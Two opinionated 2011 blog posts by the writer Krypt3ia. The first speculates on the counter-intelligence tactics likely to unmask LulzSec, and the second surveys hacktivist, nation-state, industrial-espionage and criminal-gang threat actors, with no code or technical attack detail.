The first rule of Fight Club is, you do not talk about Fight Club. #2 – The second rule of Fight Club is, you DO NOT talk about Fight Club. …
If anyone talks, they could end up in some serious shit and in this case, disappeared pretty quickly if the governments in question get their hands on them. This is especially true now that they have hit the FBI and CIA with their attacks and derision… But I digress. The key here is that because no one knows who is who or is talking about it, it is very analogous to the idea of a mole hunt or counter intelligence operations that seek to locate spies within the community (such as within the CIA) There are whole divisions in the CIA and FBI as well as other places that are solely devoted to this type of war of attrition.
I believe that it is a counter-intelligence operation that will win the day though in the battle against Lulzsec or any other like minded adversary. Winning that battle will take the following types of sub operations as well.
PSYOPS & Disinformation:
PSYOPS and Disinformation work together to unbalance the adversary as well as spin the masses toward compliance or action. In the case of LulzSec, this type of activity is already ongoing with their own ‘Manifesto‘ and other publicity that they have put out. They want to spin opinion and generate adoration as well as fear, both of these are in evidence within the media cycle and the public’s perception of who and what they are. Where I am seeing both types of activity on Lulzsec’s part, I can also see within the actions of jester and the Web Ninja’s as well.
On the part of LulzSec, the following psychological operations and disinformation campaigns can be seen:
- For each alleged ‘outing’ of a member, they make claims that these are not core members of their group (note, they do not make claim to the anonymous model of headless operations) such outed persons who can be connected to them are merely underlings in open IRC channels
- Affecting accents and 4chan speak to attempt to hide their real patterns of writing and mannerisms
- A claim to having battles with 4chan and /b/ as well as Anonymous while they seem much more aligned to them (distancing)
- The use of agent provocateurs against Jester within his own coterie of followers and open IRC channel
- The use of flash mobs (abuse) within Jester’s open IRC channel
- Leveraging the fact that they are anonymous (in concept) and due to the technology today, virtually untouchable
On the part of Jester we have the following operational tactics used so far:
- The outing of individuals believed to be core members of the group (no matter if correct, will prompt a reaction from Lulzsec that may be telling)
- The use of agent provocateurs to place disinformation as well as gather intel on the adversary (Lulzsec) which can be seen in leaked IRC chat transcripts
- The creation of analogous groups such as the Web Ninja’s to work against LulzSec
- Leveraging the fact that he is just as anonymous (in concept) as they are and due to the technology today, virtually untouchable
It seems from both sides of the battle, that these types of actions are being used to mislead and gain the edge over the other. In the case of Jester, I am pretty sure that this is an overt thing. While, on the other hand, with Lulzsec, I see it as a reactionary set of measures to attempt to keep themselves from being exposed as to who and where they are. As this continues, I am willing to hazard that even more players are playing a part in this war, quietly, and those would be the government operatives looking for an in to take the Lulz down. Of course, the government has been pretty quiet about Lulzsec haven’t they? One wonders just what they are up to.. If anything at all.
Of course, the NSA may just be the dark horse here… And the Lulz won’t know what hit them.
Then it will be over.
Development of Sources:
One of the more tradecraft oriented things that must be going on is the use of sources or getting assets into positions to be inside the Lulz Boat. I am sure that there are players out there sidling up to the right users on the IRC boards in an attempt to get into the inner circle of LulzSec as well as Anonymous. These assets are likely to be working for the government but I can also see someone like Jester using the same tactic, if not posing himself as the asset. Due to the nature of the problems of tracking these people, this is the best way to get close to the Lulz and to gather raw intelligence on them. After all, even if not fully trusted, an asset can gather important data on the actions of the Lulz and be there when they make a crucial mistake.
The other side of that coin may be people who have been outed and were in fact affiliated with the Lulz. This is where the FBI has a forte in turning hackers into informants by allowing them to work for them instead of just being put in a hole somewhere. It has happened in the past (carders for example) and likely is the case in the Lulz affair. After all, some have been ‘vanned’ already in Anonymous circles and I have yet to hear about any real solid court cases being filed.. So.. One tends to think that there is a bit of cooperation going on with those who have been popped already for being suspected ‘anons’
In the case of the Lulz, we have yet to see or hear of anyone being taken into custody for being afiliated with the Lulz.. But, the day is young especially of late.
Habits Will Be Their Downfall:
Overall, I would say from what I have seen in IRC and in other data located out there on key user names, that human nature and habits will be the downfall of the Lulz. People have habits and these can be leveraged to attack them. No one is perfect and none of these people to my knowledge have been trained to avoid the pitfalls of habit that a trained operative would. Insofar as the Jester seems to have hit the mark in a few cases is telling that people are leaking data. Either the Lulz themselves have been careless (as they harp on password re-use, I harp on user name re-use) or they have indeed been infiltrated by assets of the enemy, or, have decided to go down another less dangerous path in hopes of not being prosecuted.
Habitual behaviour too is not only action, but mannerisms, thought processes, and enunciation of motives. Just as coders tend to code in specific ways that can be used as ‘digital DNA’ so too can writing patterns, speech, etc even when attempted to be clothed in 4chan speak. As well, the habits of human nature to be trusting will too be their downfall. After all, unless this is a one person operation, there are many links in the chain that could and will be exploited. As people seem to be dropping off of the Lulz Boat (per Jester’s data) they will need new blood to keep the Lulz going, and that means that they will have to recruit, vet, and eventually trust someone…
And that is where the counter-intelligence operation will seal the deal… The phrase “Trust No One” just cannot be a reality in any operation. This is why they sometimes fail, because you trust the wrong person.
Over Reliance On Technology:
In the meantime, the Lulz seem to be relying quite a bit on technologies that are rapidly becoming susceptible to attacks by those who want to capture or stop them. The use of Anonymous proxies like Tor, while effective now, are also compromise-able from a few different perspectives. The technology may be solid, but the pressures legally on those who run them may in fact lead to compromise. Just as any of these avenues of anonymization that are out there could in fact be just honey-pots to capture data. A case in point would be Tor, which was a Navy project to begin with and anyone who has set up an exit node, can in fact sniff the traffic for data that may be helpful in getting a lock on a user.
Additionally, any other means of technology like cloud services that are hosting their data or facilitating anything the Lulz do, could potentially be compromised if the right people are involved *cough NSA cough* that have the latitude to do what they like. Given today’s surprising numbers of laws being passed that erode all of our rights to privacy, I should think that the days are numbered for the Lulz on the technical playground as the boys at Ft. Meade start getting their orders to lock and load.
Never trust so much in technologies that YOU do not run solely yourself.. Remember the government can make any company that MITM attacker and YOU the attacked.
The End:
In the end, I think that the Lulz have pointed out that ‘Elephant with its trunk in out collective coffee” but at what price? Will this change the paradigm and make the government care about security in a more cogent way? No. Instead they will come up with tougher laws and more ways to invade privacy by shortcutting the process. Sure, shit is out there and it is vulnerable, but you know what? It always will be. If it isn’t some very low hanging fruit like SQLi then it will be 0day. There will always be a way in. That is just the nature of things and the Lulz will have shifted paradigm.. Because truly, the Lulz will be on LulzSec, emotionally charged and sorry for their actions… While sitting in jail.
K.
*EDIT* Oh and one more thing to add here as an afterthought. I may remind you all that as the laws are changing and the Patriot Act has been re-signed. The Lulz, having upped the ante, can easily be considered ‘Domestic Terrorists” This would place them in even a more precarious place because then, the legal gloves come off….
One man’s Domestic Terrorist is another man’s “Enemy Combatant”
From Lulz to Global Espionage: The Age of the Cracker
It seems that 2011 is turning into the year of the cracker. Between Anonymous, Lulzsec, and the ongoing wave of espionage being carried out by nation states, we have begun to see just how serious a threat cacking really is. Of course both of these groups of attacks have greatly differing motives as well as means. Lulzsec, well, is doing it for the Lulz and the others such as nation states or criminal gangs, are doing it for political, financial, or personal gains. In this post I will cover all three groups and their motives as well as means.
Lulzsec:
Lulzsec is a splinter group of Anonymous who for all intents and purposes, have decided to carry out raids on any and all sites that they feel need their attention. This could be simply a process of finding the lowest hanging fruit and exploiting it or, there may be some further agenda that they have yet to explain fully. So far though, we have the simple explanation of “They are doing it for the Lulz”
Lulzsec really began their efforts with focusing their full attention on Sony Corp. Sony pissed them off by attempting to prosecute a coder/hacker/reverse engineer named GeoHotz. Geohotz managed to tinker with some Sony code and they went out of their way to try and destroy him. It’d be one thing if he was being malicious, but Geohotz was not.. Instead Sony was. This caused a great backlash in the hacker community against Sony, and though they came to an agreement with Geohotz, Lulzsec decided they needed some attention.
After numerous attacks on Sony that netted Lulzsec much data and showed just how poor Sony was at protecting their client data, Lulzsec decided to take their show on the road so to speak. They began their new campaign with “The Lulz Boat” which set sail for #fail as they say. Soon the Lulz were epic and the target scope began to open up. Lulzsec attacks began to show up on Pirate Bay as well as on pastebin where they would dump the data from their attacks and laugh at the targets poor security.
What once seemed to be revenge has now morphed into a free for all of potential piratical actions for unknown reasons by Lulzsec. Of late, they also seem to be profiting from their actions by donations of bitcoins as well as perhaps other help from the masses who enjoy their antics. It is hard to tell exactly what the agenda seems to be for Lulzsec as it is still evolving…
Meanwhile, their actions have risen the ire of not only the likes of Sony, but now the governments of the world as well as their law enforcement communities. Who knows how long it will be before they are collared or if they will be at all.
Nation State Actors:
The ‘Nation State Actors’ may well be the most sophisticated group here. Many of you likely have heard the term APT, and this group would be the core of the APT. Those nations that have the means to use assets at their disposal to make long term and concerted attacks against their targets. This is the real meaning of APT (Advanced Persistent Threats)
What we have seen in these last few months is either an escalation on their part, or, we are just now catching on to their attacks by actually paying attention to information security. I am not sure which it is really, but, I lean toward there being more attacks as the programs developed by certain countries have solidified and spun up. As you have seen here, I have made much mention of China as being the culprit in many of the attacks recently. I stand by that assessment, but one must not forget other countries like Russia or Israel for APT attacks.
This all of course is just a natural progression from the old school espionage with physical assets in the field to a digital remote attack vector. As we have gotten wired, so has the espionage game. In the case of the wired world, unfortunately, much of the security that would usually surround assets in the old days, are not put into place in the digital. Why is this? It could be a lack of understanding, or, it could also be that the technology has outpaced the security values that they require to protect the data within.
Either way, hacking/cracking has now become a tool of war as well as intelligence gathering. It’s just a fact of life today and unfortunately the vendors and users have not caught up on means to protect the assets properly.
Industrial Espionage:
This is where the APT, Lone crackers, Companies, and Nation States meet. All of these groups use hacking/cracking as a means to an end. In the case of nation states, they are often looking to steal IP from companies. Often times that IP happens to be from defense contractors. This is a dual use type of technology both for war as well as any technology taken could further their own in many other ways.
In today’s world, you have all of these players using attacks to steal data for themselves, or their masters. The recent attacks on Lockheed are just this, APT attacks, likely by China engaged to steal IP on military hardware and technologies to augment their own and compete not only on the battlefield but also economically.
Other attacks are likely un-noticed and carried out by single aggressors or small teams that hire themselves out for this purpose. These are the civilian equivalent of the nation state spies and often can be contracted by nation states or other companies to carry out the work. In fact, this has become a boutique niche for certain individuals and companies in the ‘private intelligence’ arena. For this type of actor, I suggest reading ‘Broker, Trader, Lawyer, Spy’
Criminal Gangs:
This brings me to the criminal gangs. These are most commonly from the Eastern Block (The former Soviet Union) and they too often work tacitly for the government. In the case of Russia, there is a large amount of governmental complicity with the gangs. This is because much of the Russian government is made up of Russian mob types or, are paid handsomely by them for complicity.
Much of the crimeware trojans out there are Russian (Ukraine) made and the money that they steal from their quick hits goes to the East. Just by looking at the news, you can see how many ATM skimming attacks have money mules hired by the Russians and how often the money makes its way there. An interesting convergence here is also the connection between the Chinese in some cases and the Russians working together. There was a spate of Russian run botnets that had Chinese involvement as well as Russian servers/sites showing up in China recently.
With the synergy of the Russian and the Chinese malware makers working together, we will have a level of attacks that will only escalate as they learn from each other and perfect their methods. Meanwhile, they are robbing places blind by stealing PII data to create identities with as well as just transferring large sums of money digitally from banks that lately seem to be getting off for not performing the due diligence of security on behalf of their clients.
When The Players All Meet:
It seems that in the end all of the players meet at the nexus of digital crime. Whether its stealing data for profit, or as an act of patriotism for a nation state, all of the players work within the same digital playground. As the technologies meet, so do the players and it is likely there will be bleeding together of means and opportunity.
In the case of Lulzsec, it has yet to be determined what they really are all about other than the laughs. As they were once a part of Anonymous, one might think they might have a political agenda, but they have said otherwise. However, some of their actions speak to a more political bent than anything else. The recent attack on the senate websites seems to belie at least some politics at play as they stated they didn’t like them very much.
More importantly though, it is the response by the nation states and their law enforcement groups that will be interesting. For groups like Lulzsec, they are now passing from the nuisance category into perceived enemies of the state. Once they start attacking government and military targets with their lulz, then they are likely to see a more hardened response from intelligence agencies as well as the likes of the FBI.
Once the laws and the enforcement agencies catch up with the technology, then we are going to see some interesting times…
K.
Krypt3ia 